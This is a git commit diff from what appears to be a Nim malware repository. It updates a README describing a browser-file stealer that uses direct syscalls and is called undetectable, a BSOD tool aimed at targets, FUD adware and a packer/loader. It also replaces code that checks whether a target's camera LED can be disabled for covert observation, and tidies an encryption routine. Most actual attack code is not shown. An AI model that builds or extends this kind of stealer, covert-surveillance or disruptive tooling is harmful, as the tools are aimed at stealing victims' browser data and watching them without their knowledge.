[S] moved some files. Added browser.nim.

eline
2023-11-30 22:41:52 +01:00
parent f3d9936636
commit ed08a4616c
10 changed files with 39 additions and 73 deletions


@@ -10,11 +10,10 @@ Takes an input bytearray and writes it to disk as first CLI argument when run.
format: format:
[seq[byte]](@[0x40,0x80] [seq[byte]](@[0x40,0x80]
# encfile.nim # encfile.nim
Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data. Has multiple functions to encrypt text and/or files (streams) with AES-256 derived using HMAC (SHA512_256). Max. password size 1024 characters. Tested. Is suitable for sensitive data.
Has a fingerprint/is detectable. Has a fingerprint/is detectable.
# OFFENSIVEencfile.nim # OFFENSIVEencfile.nim
Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size. Very stripped-down encryption tool. Takes a stream and encrypts it (AES256 with HMAC SHA512_256). No max. password size.
Has a fingerprint/is detectable. Has a fingerprint/is detectable.
@@ -22,18 +21,20 @@ Has a fingerprint/is detectable.
# Packer.nim # Packer.nim
Ideally a "packer"/loader for the main stage. Still very experimental and needs heavy rework. Ideally a "packer"/loader for the main stage. Still very experimental and needs heavy rework.
# checkfile.nim
Basic program that uses direct/hidden syscalls to know if a file exists. Undetectable in normal conditions.
Can be chained with other direct syscalls to copy sensitive files.
# Browser.nim
Uses direct syscalls to know if Firefox and Chrome are installed. Afterwards, steals the files, puts them in an encrypted archive and encrypts it with AES-256 (HMAC SHA512_256 derivation). Undetectable in theory and practice. Spoofs PID.
# bsod.nim # bsod.nim
Serves a BSOD to targets on Windows. Serves a BSOD to targets on Windows.
# basicadware.nim
Basic adware. Selects messages based on a pool. FUD.
# mic_reg.nim # mic_reg.nim
[Broken] [Broken]
Checks if Windows OSD is enabled. Checks if Windows OSD is enabled.
# checkfile.nim
Basic program that uses direct syscalls to know if a file exists. Undetectable in normal conditions.
Can be chained with other direct syscalls to copy sensitive files.
# basicadware.nim
Basic adware. At execution, shows a MessageBox with a title and content picked from a random (limited) pool.


@@ -1,47 +0,0 @@
# ____ _____ ____ ____ _____ _____
# / ___|| ____/ ___| _ \| ____|_ _|
# \___ \| _|| | | |_) | _| | |
# ___) | |__| |___| _ <| |___ | |
# |____/|_____\____|_| \_\_____| |_|
import winim
# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
# therefore, this program does not guarantee that the user will not know about the observation.
# DOES NOT WORK.
const
KEY_QUERY_VALUE = 0x0001
HKEY_HANDLE = 0x80000002
proc checkRegistryEntry(): bool =
var hKey: HKEY
var value: DWORD
var dataSize: DWORD = sizeof(DWORD)
if RegOpenKeyEx(HKEY_HANDLE, "SOFTWARE\\Microsoft\\OEM\\Device\\Capture", 0, KEY_QUERY_VALUE, addr hKey) != ERROR_SUCCESS:
echo "Error opening registry key. Error code:", GetLastError()
return false
if RegGetValueA(HKEY_HANDLE, "NoPhysicalCameraLED", nil, nil, cast(LPBYTE, addr value), addr dataSize) != ERROR_SUCCESS:
echo "Error querying registry value. Error code:", GetLastError()
# Close the registry key even if querying failed
RegCloseKey(hKey)
return false
# Close the registry key if everything is successful
RegCloseKey(hKey)
echo "NoPhysicalCameraLED value:", value
return value == 0x1
# Example usage
if checkRegistryEntry():
echo "NoPhysicalCameraLED is set to 0x1."
else:
echo "NoPhysicalCameraLED is not set to 0x1."


@@ -0,0 +1,15 @@
# ____ _____ ____ ____ _____ _____
# / ___|| ____/ ___| _ \| ____|_ _|
# \___ \| _|| | | |_) | _| | |
# ___) | |__| |___| _ <| |___ | |
# |____/|_____\____|_| \_\_____| |_|
# Checks the status of the Windows "Privacy Bubbles" to know if target device has the Windows camera LED enabled.
# however, it should be noted that most PC/laptop manufacturers include a hardwired LED that cannot be disabled.
# therefore, this program does not guarantee that the user will not know about the observation.
# Might work. Untested, honestly.
# HKLM\\SOFTWARE\\Microsoft\\OEM\\Device\\Capture\\NoPhysicalCameraLED
# 0x0 means false, 0x1 true


@@ -211,20 +211,11 @@ proc encryptStream*(fIn: Stream, fOut: Stream, passw: string, bufferSize: int) =
# with big files # with big files
# Default is 64KB. # Default is 64KB.
proc encryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) = proc encryptFile*(infile: string, outfile: string, passw: string, bufferSize: int = bufferSizeDef) =
try: let fIn = newFileStream(infile, mode = fmRead)
let fIn = newFileStream(infile, mode = fmRead) defer: fIn.close()
defer: fIn.close() let fOut = newFileStream(outfile, mode = fmWrite)
defer: fOut.close()
let fOut = newFileStream(outfile, mode = fmWrite) encryptStream(fIn, fOut, passw, bufferSize)
defer: fOut.close()
encryptStream(fIn, fOut, passw, bufferSize)
except CatchableError:
let
e = getCurrentException()
msg = getCurrentExceptionMsg()
echo "Inside checkIn, got exception ", repr(e), " with message ", msg
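Review bot: With the try/except removed, nothing in `encryptFile` handles a file that cannot be opened: `newFileStream(filename, mode)` returns `nil` instead of raising, so `defer: fIn.close()` and the `encryptStream` call would dereference nil when `infile` is missing or `outfile` is not writable. Switching both streams to the raising variant, `let fIn = openFileStream(infile, fmRead)` and `let fOut = openFileStream(outfile, fmWrite)`, gives callers an `IOError` they can handle. Note also that `outfile` is opened for writing before any encryption runs, so a failure inside `encryptStream` leaves a partial ciphertext on disk. A doc comment such as `## Raises IOError if either file cannot be opened; a failed run may leave a partial outfile.` would make that contract explicit now that errors propagate.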


@@ -19,8 +19,7 @@ proc MessageBox*(hWnd: HWND, lpText: LPCSTR, lpCaption: LPCSTR, uType: UINT): in
var var
titlemessages = @["Are you really free?", titlemessages = @["Are you really free?","You got games on your phone?","Poland!"]
"Poland!"]
captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.", captionmessages = @["From the river to the sea, Palestine will be free.", "We are the people of Heaven.",
"War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings "War is peace. Slavery is freedom. Ignorance is strength.","Kurva mac!"] # todo: convert to cstrings
randomize() # seeds randomizer randomize() # seeds randomizer


@@ -0,0 +1,7 @@
# _____ ___ ____ ____ _____ ____ ____ _____ _____
# |_ _/ _ \| _ \ / ___|| ____/ ___| _ \| ____|_ _|
# | || | | | |_) | \___ \| _|| | | |_) | _| | |
# | || |_| | __/ ___) | |__| |___| _ <| |___ | |
# |_| \___/|_| |____/|_____\____|_| \_\_____| |_|